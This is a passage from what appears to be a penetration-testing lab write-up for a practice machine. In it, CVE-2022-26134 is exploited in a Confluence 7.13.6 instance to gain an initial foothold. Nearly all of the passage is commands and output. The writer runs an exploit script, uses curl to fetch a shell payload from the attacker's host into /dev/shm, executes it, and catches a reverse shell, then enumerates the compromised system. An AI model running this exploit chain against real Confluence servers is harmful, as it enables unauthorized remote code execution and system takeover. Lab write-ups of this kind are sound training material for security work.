RCE
The target Confluence instance appears to be vulnerable to CVE-2022-26134
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/flu/CVE-2022-26134]
└─$ python3 cve-2022-26134.py http://$IP:8090 'id'
Confluence target version: 7.13.6
uid=1001(confluence) gid=1001(confluence) groups=1001(confluence)
Code execution confirmed
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/flu/CVE-2022-26134]
└─$ python3 cve-2022-26134.py http://$IP:8090 'curl -s http://192.168.45.198/shell -o /dev/shm/shell'
Confluence target version: 7.13.6
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/flu/CVE-2022-26134]
└─$ python3 cve-2022-26134.py http://$IP:8090 'chmod 755 /dev/shm/shell'
Confluence target version: 7.13.6
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/flu/CVE-2022-26134]
└─$ python3 cve-2022-26134.py http://$IP:8090 '/dev/shm/shell'
Confluence target version: 7.13.6
Transferring & executing the payload
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/flu/CVE-2022-26134]
└─$ nnc 8091
listening on [any] 8091 ...
connect to [192.168.45.198] from (UNKNOWN) [192.168.144.41] 56972
whoami
confluence
hostname
flu
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:9e:08:79 brd ff:ff:ff:ff:ff:ff
altname enp3s0
inet 192.168.144.41/24 brd 192.168.144.255 scope global ens160
valid_lft forever preferred_lft forever
Initial Foothold established to the target system as the confluence
account via exploiting CVE-2022-26134